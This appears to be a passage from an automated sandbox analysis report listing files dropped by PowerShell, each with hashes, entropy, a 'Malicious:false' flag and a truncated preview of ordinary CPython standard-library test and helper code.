                                                                                                                                                                                                              Preview:from unittest import mock..from test import support..from test.support import socket_helper..from test.test_httpservers import NoLogRequestHandler..from unittest import TestCase..from wsgiref.util import setup_testing_defaults..from wsgiref.headers import Headers..from wsgiref.handlers import BaseHandler, BaseCGIHandler, SimpleHandler..from wsgiref import util..from wsgiref.validate import validator..from wsgiref.simple_server import WSGIServer, WSGIRequestHandler..from wsgiref.simple_server import make_server..from http.client import HTTPConnection..from io import StringIO, BytesIO, BufferedReader..from socketserver import BaseServer..from platform import python_implementation....import os..import re..import signal..import sys..import threading..import unittest......class MockServer(WSGIServer):.. """Non-socket HTTP server""".... def __init__(self, server_address, RequestHandlerClass):.. BaseServer.__init__(self, server_address, RequestHandlerClass).. self.server_b
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2386
                                                                                                                                                                                                              Entropy (8bit):4.6806323676364325
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:FrJ2+gDGELfNVpMn3GYuUMxMokFaF/m/mcfSfv+uK4G4pe:FrRgKELlWzuUMxMo0aF/m/9SfvQcA
                                                                                                                                                                                                              MD5:8ED788AA533AC06860AAA9C382D0E3AC
                                                                                                                                                                                                              SHA1:7DFA5B42ECB0081840FA9383F956D57F201F547E
                                                                                                                                                                                                              SHA-256:06E1B288C66A9BF6092E5C71C070054225FEA94C33800E0D16D180FA71D5675A
                                                                                                                                                                                                              SHA-512:DCC6405A0465414CAA75A74FFCD0F07C642102A8F20634ABDA35987E15F1872AF4417F546C9FE30AC4424D1F2FEDA8D4BCFCF0B6E1B121BD13515104EFEB257C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest..from test.support import warnings_helper....xdrlib = warnings_helper.import_deprecated("xdrlib")......class XDRTest(unittest.TestCase):.... def test_xdr(self):.. p = xdrlib.Packer().... s = b'hello world'.. a = [b'what', b'is', b'hapnin', b'doctor'].... p.pack_int(42).. p.pack_int(-17).. p.pack_uint(9).. p.pack_bool(True).. p.pack_bool(False).. p.pack_uhyper(45).. p.pack_float(1.9).. p.pack_double(1.9).. p.pack_string(s).. p.pack_list(range(5), p.pack_uint).. p.pack_array(a, p.pack_string).... # now verify.. data = p.get_buffer().. up = xdrlib.Unpacker(data).... self.assertEqual(up.get_position(), 0).... self.assertEqual(up.unpack_int(), 42).. self.assertEqual(up.unpack_int(), -17).. self.assertEqual(up.unpack_uint(), 9).. self.assertTrue(up.unpack_bool() is True).... # remember position.. pos = up.ge
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4420
                                                                                                                                                                                                              Entropy (8bit):4.5446776947374525
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:XPZdFUNnCoa1pFUS8YWGCNpF5aQ/TMX8TMXPzQfrzJC9rHa1:XBdjobt/TMMTMLkgy
                                                                                                                                                                                                              MD5:6C671CD87EAF95E54589F7D905F19226
                                                                                                                                                                                                              SHA1:00EF6FDBA2ACD34A4123CFB311924A547A65E703
                                                                                                                                                                                                              SHA-256:4F7ED42C2FE38B512450743A1FAAAA2BA3EA08A8A1E24BCD064A6CCE5D3CA550
                                                                                                                                                                                                              SHA-512:50DE7E38BABA7C0B1E0B50E903AE790F2B6A343E6C21609FDC2A8E60B8E239A62B6406F4453543B1D08D0A1413CB88A6733E952A71E8D01FC019F44C22B970D7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Tests for xml.dom.minicompat....import copy..import pickle..import unittest....import xml.dom..from xml.dom.minicompat import *......class EmptyNodeListTestCase(unittest.TestCase):.. """Tests for the EmptyNodeList class.""".... def test_emptynodelist_item(self):.. # Test item access on an EmptyNodeList... node_list = EmptyNodeList().... self.assertIsNone(node_list.item(0)).. self.assertIsNone(node_list.item(-1)) # invalid item.... with self.assertRaises(IndexError):.. node_list[0].. with self.assertRaises(IndexError):.. node_list[-1].... def test_emptynodelist_length(self):.. node_list = EmptyNodeList().. # Reading.. self.assertEqual(node_list.length, 0).. # Writing.. with self.assertRaises(xml.dom.NoModificationAllowedErr):.. node_list.length = 111.... def test_emptynodelist___add__(self):.. node_list = EmptyNodeList() + NodeList().. self.assertEqua
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):166369
                                                                                                                                                                                                              Entropy (8bit):4.833972376048433
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:wLQDbReFhqVV0Z8oAC9pCJ8aa7rjruu/d5WvIWxNXOwDqA8+EdXZcdh3VlApDYOb:wLQDbyhqVV042GYdXZcdVSYOdRCqPexG
                                                                                                                                                                                                              MD5:676FC845DA5192DCE25DCD1CC9928952
                                                                                                                                                                                                              SHA1:A333248FEE50ED74F623B8A52032019C7148C97D
                                                                                                                                                                                                              SHA-256:13D99C858FA67491B45B5C31FD9BA01137FEF3E7B3D8E217EB922F11438DE62B
                                                                                                                                                                                                              SHA-512:BF944CB86ECCC86BF068DA0377A9B50A89CE32865048913C2A37F223D8F7EC65A1954AFB51E8D10C7E9E52D7D6904F5A11908F770A865251B34EC4B63083EBA6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# IMPORTANT: the same tests are run from "test_xml_etree_c" in order..# to ensure consistency between the C implementation and the Python..# implementation...#..# For this purpose, the module-level "ET" symbol is temporarily..# monkey-patched when running the "test_xml_etree_c" test suite.....import copy..import functools..import html..import io..import itertools..import operator..import os..import pickle..import sys..import textwrap..import types..import unittest..import warnings..import weakref....from functools import partial..from itertools import product, islice..from test import support..from test.support import os_helper..from test.support import warnings_helper..from test.support import findfile, gc_collect, swap_attr, swap_item..from test.support.import_helper import import_fresh_module..from test.support.os_helper import TESTFN......# pyET is the pure-Python implementation...#..# ET is pyET in test_xml_etree and is the C accelerated version in..# test_xml_etree_c...pyET = Non
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9839
                                                                                                                                                                                                              Entropy (8bit):4.511578909784529
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:mFWrb2fbobgNIe7nO+WrUPAV3qsaefgyuzuyagzVgyd+gzdadsZcd6EvoiScxsl0:HD4AVKradsm1vucK3FVqTjTvTc6zU6Cy
                                                                                                                                                                                                              MD5:6A58E0B92D1186EAEE61B65F27F8ECDC
                                                                                                                                                                                                              SHA1:1C0A80A4413859DEC4846905489C7046165AD0B6
                                                                                                                                                                                                              SHA-256:209139765B9983A626D1E577F678D22054F7BDFAF5E09C6E0C197F93B3EE0E56
                                                                                                                                                                                                              SHA-512:5C18FCDDDBD0E3125380E2A9CAF169D5068C6D31BC420BA155EFF92BE6C234957AC071761EACC648331B80B59923E1B915B9A18A07C261337F026ADF63A8A110
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# xml.etree test for cElementTree..import io..import struct..from test import support..from test.support.import_helper import import_fresh_module..import types..import unittest....cET = import_fresh_module('xml.etree.ElementTree',.. fresh=['_elementtree'])..cET_alias = import_fresh_module('xml.etree.cElementTree',.. fresh=['_elementtree', 'xml.etree'],.. deprecated=True)......@unittest.skipUnless(cET, 'requires _elementtree')..class MiscTests(unittest.TestCase):.. # Issue #8651... @support.bigmemtest(size=support._2G + 100, memuse=1, dry_run=False).. def test_length_overflow(self, size):.. data = b'x' * size.. parser = cET.XMLParser().. try:.. self.assertRaises(OverflowError, parser.feed, data).. finally:.. data = None.... def test_del_attribute(self):.. element = cET.Element('tag').... element.tag = 'TAG'.. with self.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):61007
                                                                                                                                                                                                              Entropy (8bit):4.797923080264468
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:tzspX4omAlu7GIDhZRHvq1m7mVEZog8Ma:tz+4omAlui+3q8a/JMa
                                                                                                                                                                                                              MD5:2424D0FFA7426F6C61C9A8E2BE957D7A
                                                                                                                                                                                                              SHA1:B71ADA9D8CCF3B40CC9090B8ABBB1E00162FDEA7
                                                                                                                                                                                                              SHA-256:755C135BC8C2DE0F8003D0B6D4089CACA34C907E57FA05E404D6CDC91C104302
                                                                                                                                                                                                              SHA-512:512CE4885B0877859F2B454FFBB4338041FF2E59BC32197CD4E12FE2E7BF3A881F72E9A43511A80E803EEAFB3DCE28ECF1C383B0798D665220AEFA23F349AEF4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import base64..import datetime..import decimal..import sys..import time..import unittest..from unittest import mock..import xmlrpc.client as xmlrpclib..import xmlrpc.server..import http.client..import http, http.server..import socket..import threading..import re..import io..import contextlib..from test import support..from test.support import os_helper..from test.support import socket_helper..from test.support import threading_helper..from test.support import ALWAYS_EQ, LARGEST, SMALLEST....try:.. import gzip..except ImportError:.. gzip = None....support.requires_working_socket(module=True)....alist = [{'astring': 'foo@bar.baz.spam',.. 'afloat': 7283.43,.. 'anint': 2**20,.. 'ashortlong': 2,.. 'anotherlist': ['.zyx.41'],.. 'abase64': xmlrpclib.Binary(b"my dog has fleas"),.. 'b64bytes': b"my dog has fleas",.. 'b64bytearray': bytearray(b"my dog has fleas"),.. 'boolean': False,.. 'unicode': '\u4000\u6000
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):985
                                                                                                                                                                                                              Entropy (8bit):4.741552558870738
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:aZuOaPk+GbHDiwxk1FjIQEF7YF2r7ZP9pe:aZDL+sk1pIQ8YivA
                                                                                                                                                                                                              MD5:CDBB76822A5AA816478B0D08FCF94AA0
                                                                                                                                                                                                              SHA1:60815C60C25D15D8A3CDFFBA61648E38E14606E8
                                                                                                                                                                                                              SHA-256:D4DE925A4A1A569FD61612CDCBD149876881B8EDEE7D34191483D80CB129A127
                                                                                                                                                                                                              SHA-512:C23E1A593E7ED2CE758630C91C8D947A21253DCC26D762F365FB6375A614DB4D8EC1F576285BD1F1C522C9E19DDE200A9C6D1D1C43D66F08F4AAFD36B4336478
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import collections.abc..import unittest..from test import support....import xmlrpc.client as xmlrpclib......support.requires("network")......@unittest.skip('XXX: buildbot.python.org/all/xmlrpc/ is gone')..class PythonBuildersTest(unittest.TestCase):.... def test_python_builders(self):.. # Get the list of builders from the XMLRPC buildbot interface at.. # python.org... server = xmlrpclib.ServerProxy("http://buildbot.python.org/all/xmlrpc/").. try:.. builders = server.getAllBuilders().. except OSError as e:.. self.skipTest("network error: %s" % e).. self.addCleanup(lambda: server('close')()).... # Perform a minimal sanity check on the result, just to be sure.. # the request means what we think it means... self.assertIsInstance(builders, collections.abc.Sequence).. self.assertTrue([x for x in builders if "3.x" in x], builders)......if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2611
                                                                                                                                                                                                              Entropy (8bit):4.5888739071373275
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:FrnqvqaLILGLIX0Yq7/HqVt1pql5lVIqVJ1otFH6K:FrnELcCce/Hi1pQ5lVIm1otdX
                                                                                                                                                                                                              MD5:890CA3688EDC5A06D6EDBBB94DB20E73
                                                                                                                                                                                                              SHA1:00AEA67D1A92AD577DCC8ED3E3A08C7819F66231
                                                                                                                                                                                                              SHA-256:8209708950A849A8AFDF4F5C9947B143514DE37A127BA50A5F2D438D46F4ED98
                                                                                                                                                                                                              SHA-512:4AA228D47438C61445568D6831AB8A8582E0F35E2C9252890DF03C04C72692F85F59F04EF876944BE80DCD859D9EC79645200C0C987623596F1C2B84B7AC2CBA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest..from test.support import import_helper..import types....xxlimited = import_helper.import_module('xxlimited')..xxlimited_35 = import_helper.import_module('xxlimited_35')......class CommonTests:.. module: types.ModuleType.... def test_xxo_new(self):.. xxo = self.module.Xxo().... def test_xxo_attributes(self):.. xxo = self.module.Xxo().. with self.assertRaises(AttributeError):.. xxo.foo.. with self.assertRaises(AttributeError):.. del xxo.foo.... xxo.foo = 1234.. self.assertEqual(xxo.foo, 1234).... del xxo.foo.. with self.assertRaises(AttributeError):.. xxo.foo.... def test_foo(self):.. # the foo function adds 2 numbers.. self.assertEqual(self.module.foo(1, 2), 3).... def test_str(self):.. self.assertTrue(issubclass(self.module.Str, str)).. self.assertIsNot(self.module.Str, str).... custom_string = self.module.Str("abcd").. self.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):715
                                                                                                                                                                                                              Entropy (8bit):4.727979028184191
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:URAFRpH6hJji91ye2Axf2kpjaRrFpwounaoubyoujouAouhyouIaouDouRj02pQ+:/r6jinnyHmyTy7IpyBrpVpQ+
                                                                                                                                                                                                              MD5:A1950F4A0F4961882982A735F8A89261
                                                                                                                                                                                                              SHA1:C1F2D1D51FD6E0A03C1EDFEF028B13B814F52A8E
                                                                                                                                                                                                              SHA-256:724CB084529CB7DEA5EEEFB5EA7D68255537B6AD6E69B3A9F83C05428FAD1709
                                                                                                                                                                                                              SHA-512:3A0F3BC24C342A43A0F5813043081ED00EE7DD9EA0BFFAA60E1D65AB76472B22E3D9E1D556283B628A1642F8412A0095A6B438F41CD8BCC898831EA7402D91C3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import faulthandler..from test.support import import_helper..import unittest...._xxtestfuzz = import_helper.import_module('_xxtestfuzz')......class TestFuzzer(unittest.TestCase):.. """To keep our https://github.com/google/oss-fuzz API working.""".... def test_sample_input_smoke_test(self):.. """This is only a regression test: Check that it doesn't crash.""".. _xxtestfuzz.run(b"").. _xxtestfuzz.run(b"\0").. _xxtestfuzz.run(b"{").. _xxtestfuzz.run(b" ").. _xxtestfuzz.run(b"x").. _xxtestfuzz.run(b"1").. _xxtestfuzz.run(b"AAAAAAA").. _xxtestfuzz.run(b"AAAAAA\0")......if __name__ == "__main__":.. faulthandler.enable().. unittest.main()..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):53013
                                                                                                                                                                                                              Entropy (8bit):4.17416420275918
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:f1zkRoE1Hiiuz4aRh9S1avQ2i9A+xfT9Gj+Bf90fZjkKkctSt5/1HqfqLRvJYNfO:f1zduytStJ1HqfqLRvJYNfjqeB2
                                                                                                                                                                                                              MD5:8FFDBB2534E1A834E69C9AD5C2FE573D
                                                                                                                                                                                                              SHA1:05E9F25F4631EFA791351511834C9A5DBA0A9971
                                                                                                                                                                                                              SHA-256:BEB4904854BAABDCB6FFB26EA26B14063D1F66094F9FA77169B4B782143FD081
                                                                                                                                                                                                              SHA-512:76D5C3F96D2CCCE8B344338B74417858CE558E0E74090F6648C460D2186BD06C933BF93310854499BC0DAD014EE57BC3EBB567C8473839F4EDC157C7525A15AE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-...."""..Test suite for PEP 380 implementation....adapted from original tests written by Greg Ewing..see <http://www.cosc.canterbury.ac.nz/greg.ewing/python/yield-from/YieldFrom-Python3.1.2-rev5.zip>.."""....import unittest..import inspect....from test.support import captured_stderr, disable_gc, gc_collect..from test import support....class TestPEP380Operation(unittest.TestCase):.. """.. Test semantics... """.... def test_delegation_of_initial_next_to_subgenerator(self):.. """.. Test delegation of initial next() call to subgenerator.. """.. trace = [].. def g1():.. trace.append("Starting g1").. yield from g2().. trace.append("Finishing g1").. def g2():.. trace.append("Starting g2").. yield 42.. trace.append("Finishing g2").. for x in g1():.. trace.append("Yielded %s" % (x,)).. self.assertEqual(trace,[.. "Start
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):17423
                                                                                                                                                                                                              Entropy (8bit):4.5964912667026345
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:IikzD4BN5fI5/S2SpccSZKWzJxC02J3jYbXJQc3Q+WfUcyUcYvGSq7D3Z9Alep:Iik39N
                                                                                                                                                                                                              MD5:10DF74D0EC43494B5DA7C179110CE954
                                                                                                                                                                                                              SHA1:25F1BC5F5CF8E21690B2EED842C7FA1BF91D6F20
                                                                                                                                                                                                              SHA-256:BEC009281A1220707ADB05FEA9EE4DF79A81B765329CC6D17FC4AD8487B79786
                                                                                                                                                                                                              SHA-512:06EC1B253FCBC89A1EFE06D069A9D107A50809DBAF95F737987674F772ABBCDAF3DC3C178EC835E239C7FF4A0243079970389551AF737BEF3269B9E7797A736E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Test harness for the zipapp module."""....import io..import pathlib..import stat..import sys..import tempfile..import unittest..import zipapp..import zipfile..from test.support import requires_zlib..from test.support import os_helper....from unittest.mock import patch....class ZipAppTest(unittest.TestCase):.... """Test zipapp module functionality.""".... def setUp(self):.. tmpdir = tempfile.TemporaryDirectory().. self.addCleanup(tmpdir.cleanup).. self.tmpdir = pathlib.Path(tmpdir.name).... def test_create_archive(self):.. # Test packing a directory... source = self.tmpdir / 'source'.. source.mkdir().. (source / '__main__.py').touch().. target = self.tmpdir / 'source.pyz'.. zipapp.create_archive(str(source), str(target)).. self.assertTrue(target.is_file()).... def test_create_archive_with_pathlib(self):.. # Test packing a directory using Path objects for source and target... source = self.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6067
                                                                                                                                                                                                              Entropy (8bit):4.69399238306175
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:V+KNPUfi7r5raB1G+6MghJqxme978e9ZoGdFt9TVWiTzbiinT5koA:V+nEBVppXqweyeTdtf3b5n6oA
                                                                                                                                                                                                              MD5:65C48406EE9531FFFA8C5463CFD70F00
                                                                                                                                                                                                              SHA1:E58B40BF18BF18A0116BF1C7486EA75ECE98C453
                                                                                                                                                                                                              SHA-256:19BD1D5C959CA23F718E89D9F9D41A4132A9BCE2A36D6E67FC10F62DBAB360EF
                                                                                                                                                                                                              SHA-512:4672A5FF9BA341C76076A8F9AF837D3F66183AAA0CDC2B6B900A7C8A4278C519C834F813B578746D01ACE2A1AE4BBF717222A9DA4B6737CA77E4222ABC41A8FD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Tests of the full ZIP64 functionality of zipfile..# The support.requires call is the only reason for keeping this separate..# from test_zipfile..from test import support....# XXX(nnorwitz): disable this test by looking for extralargefile resource,..# which doesn't exist. This test takes over 30 minutes to run in general..# and requires more disk space than most of the buildbots...support.requires(.. 'extralargefile',.. 'test requires loads of disk-space bytes and a long time to run'.. )....import zipfile, unittest..import time..import sys....from tempfile import TemporaryFile....from test.support import os_helper..from test.support import requires_zlib....TESTFN = os_helper.TESTFN..TESTFN2 = TESTFN + "2"....# How much time in seconds can pass before we print a 'Still working' message..._PRINT_WORKING_MSG_INTERVAL = 60....class TestsWithSourceFile(unittest.TestCase):.. def setUp(self):.. # Create test data... line_gen = ("Test of zipfile line %d." %
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):147
                                                                                                                                                                                                              Entropy (8bit):4.468107897022132
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JSxQXTFRpWQVSRF8mo+vr3NZyWRjXC+g+zp+vr3crAwGfnJFU:aQDFRpXIF8twNZyAXlg6wIAa
                                                                                                                                                                                                              MD5:C3239B95575B0AD63408B8E633F9334D
                                                                                                                                                                                                              SHA1:7DBB42DFA3CA934FB86B8E0E2268B6B793CBCCDC
                                                                                                                                                                                                              SHA-256:6546A8EF1019DA695EDECA7C68103A1A8E746D88B89FAF7D5297A60753FD1225
                                                                                                                                                                                                              SHA-512:5685131AD55F43AB73AFCCBEF69652D03BB64E6135BEB476BC987F316AFE0198157507203B9846728BC7EA25BC88F040E7D2CB557C9480BAC72F519D6BA90B25
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import os..from test.support import load_package_tests....def load_tests(*args):.. return load_package_tests(os.path.dirname(__file__), *args)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):112
                                                                                                                                                                                                              Entropy (8bit):4.411817987067579
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JShh9DZLYBmo6fxOZlwjjhAjpv/FPh6RNMy:C1L6t0xVFAjpH2My
                                                                                                                                                                                                              MD5:E055AF7A21AD8C88FD6BD8ED26C1B854
                                                                                                                                                                                                              SHA1:09F1ACF20F271AB8E2C7D82F08C8FA7B3F865CCB
                                                                                                                                                                                                              SHA-256:A7B8ADFC028B454BECC239B42ABC346D1ABC219160A548EE25674A425C85987F
                                                                                                                                                                                                              SHA-512:8151E07C01C4915999842AECAEAB8E815BD7094A52B5E10998307E1F3216E180CD5DECFCE11BEC950159554C6E51FA296A19E6AC199F9192F55F13A9A2444B4E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest....from . import load_tests # noqa: F401......if __name__ == "__main__":.. unittest.main()..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):220
                                                                                                                                                                                                              Entropy (8bit):4.662717476935463
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JSmIVoawDF8X4MLdKdUWlFMeC80WMlY+zhS1ESVlxadGUlBdFo+55oE4Z2ov:vjamFtMJErtCNlYdbz4d6w4R
                                                                                                                                                                                                              MD5:C932C97D3DE3CF97541C3BA3E632AD8F
                                                                                                                                                                                                              SHA1:0EC12CE117F7D792681A9D4DC47502E41D121EF3
                                                                                                                                                                                                              SHA-256:00871C58AB4C0C0389DC0D192EC583D8CA3DE5106D3292F1A79C880B603D1E9C
                                                                                                                                                                                                              SHA-512:2FB1984D355663AE0AB74D02D01134A79EBF0DA0D959366752BBA2ECFEEC429EB998E6C6F01D9628A8DEBC9B85C4FF96D99ED207521A47CC66C07E31595274B6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import functools......# from jaraco.functools 3.5.2..def compose(*funcs):.. def compose_two(f1, f2):.. return lambda *args, **kwargs: f1(f2(*args, **kwargs)).... return functools.reduce(compose_two, funcs)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2169
                                                                                                                                                                                                              Entropy (8bit):4.466629393210794
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:yY9uHhf3HBXlaTyhXlh9yKSvWjSKUolB9+XdIm:yYqJXLIyKJmELOm
                                                                                                                                                                                                              MD5:CD300874CAFD6ACF398456B0B222096A
                                                                                                                                                                                                              SHA1:5C49446DFFC94DAE442C7A1B89756C358D471BFA
                                                                                                                                                                                                              SHA-256:190C323E170E46BA319902BB31FD02847CED2C148BBFF807B0C810843F9B0B31
                                                                                                                                                                                                              SHA-512:AA03A0098A87D76AAAAF03A99457956763A2D9B50D36E47C456B912682F032855277DEF330C148CC29E66918C82352DC291037DB2173AF0B83FFCD0DF7FF1C9C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import itertools..from collections import deque..from itertools import islice......# from jaraco.itertools 6.3.0..class Counter:.. """.. Wrap an iterable in an object that stores the count of items.. that pass through it..... >>> items = Counter(range(20)).. >>> items.count.. 0.. >>> values = list(items).. >>> items.count.. 20.. """.... def __init__(self, i):.. self.count = 0.. self.iter = zip(itertools.count(1), i).... def __iter__(self):.. return self.... def __next__(self):.. self.count, result = next(self.iter).. return result......# from more_itertools v8.13.0..def always_iterable(obj, base_type=(str, bytes)):.. if obj is None:.. return iter(()).... if (base_type is not None) and isinstance(obj, base_type):.. return iter((obj,)).... try:.. return iter(obj).. except TypeError:.. return iter((obj,))......# from more_itertools v9.0.0..def consume(iterator, n=None):.. "
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):228
                                                                                                                                                                                                              Entropy (8bit):4.4400653811533
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:Lgd8XOeeoBnIijfMpLXaUmw3M0QPtoAoxyVKBHb:LW8XbeoBxjkRSw3D6oA+B7
                                                                                                                                                                                                              MD5:6837C82C32A4B3D1EDABAB6C8F9EDAD7
                                                                                                                                                                                                              SHA1:4AB8DBDCACCEBB35820338D244C4BC8F75223BDE
                                                                                                                                                                                                              SHA-256:34FF942FA400306EA42D0ED607C5C9F76CB8C58C2E2E427A830EC0D5257A415E
                                                                                                                                                                                                              SHA-512:6E2AD2873F072BD66B3AD0339012495F7FDDCC41A580D3BD9BDCB36F5204AE73F33929021E6754952C4079B5684DF222C7C34649377CC6470E7F047910E99BF4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import importlib..import unittest......def import_or_skip(name):.. try:.. return importlib.import_module(name).. except ImportError: # pragma: no cover.. raise unittest.SkipTest(f'Unable to import {name}')..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):944
                                                                                                                                                                                                              Entropy (8bit):4.397653962347118
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:yDKPZP8N4NZek69jqhTS6ZKTI/NY4QzXGcEHgUb:yDKxUmek6OlKT0Qa7g6
                                                                                                                                                                                                              MD5:09BA331E9B842F87C1A71AF9CE2966E0
                                                                                                                                                                                                              SHA1:A92D335C421896E6E4B7C8AC8EDF66A5219FAB55
                                                                                                                                                                                                              SHA-256:01F42E8D71AF8421B2A51AC7B878F485C9F058AA61D1F60B3F53EF7CF9234C79
                                                                                                                                                                                                              SHA-512:18FED53D0B2A0E734B091A16F175FAB1571476D8F119E11C799B3ECAAC77A98E2BEEC1F61AE4C2298A430D74E1488588C1BD5971473B444A3691C72DD8575F54
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import types..import functools....from ._itertools import always_iterable......def parameterize(names, value_groups):.. """.. Decorate a test method to run it as a set of subtests..... Modeled after pytest.parametrize... """.... def decorator(func):.. @functools.wraps(func).. def wrapped(self):.. for values in value_groups:.. resolved = map(Invoked.eval, always_iterable(values)).. params = dict(zip(always_iterable(names), resolved)).. with self.subTest(**params):.. func(self, **params).... return wrapped.... return decorator......class Invoked(types.SimpleNamespace):.. """.. Wrap a function to be invoked for each usage... """.... @classmethod.. def wrap(cls, func):.. return cls(func=func).... @classmethod.. def eval(cls, cand):.. return cand.func() if isinstance(cand, cls) else cand..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
